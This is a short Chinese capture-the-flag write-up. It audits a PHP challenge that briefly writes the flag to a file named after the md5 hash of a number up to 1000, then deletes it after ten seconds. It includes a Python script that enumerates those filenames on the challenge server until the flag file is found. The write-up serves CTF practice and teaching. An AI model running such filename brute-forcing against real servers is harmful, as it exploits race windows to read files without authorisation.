中级CTF:天下武功唯快不破 writeup

CTF一:http://106.75.26.211:3333/

题目提示信息:天下武功唯快不破

1.访问页面，查看到是把源码给出来了得

通过代码审计：

利用setcookie把hello赋给token，并生成一个cookie

file_get_contents函数是把整个文件读入一个字符串中

file_put_contents($filename,$txt) 把变量txt里的每一个字符写入到filebame中

这里的大致意思为当token=hello是，把flag.php文件里的字符导入到路径:/u/通过md5加密的一个1到1000的的密文.txt，而且在10秒后进行删除，所以我们的速度必须要快

2.个人手速比较慢，10秒太短了，所以利用python脚本，代码如下:

import requests
import re
import md5


for i in range(0,1001):
    m1 = md5.new()
    m1.update(str(i).encode(encoding='utf-8'))
    url='http://106.75.26.211:3333/u/'+m1.hexdigest()+'.txt'
    r = requests.get(url)
    if(r.status_code!=404):
        print i
        print url
        print r.status_code
        print r.text
        break
    else:
        print i
        print "404"

3.利用脚本进行**，成功获取（爆不出来，可以尝试在爆的过程中多对页面进行刷新）

感谢各位大佬赏脸，有什么不足的地方请多多指教，谢谢！！！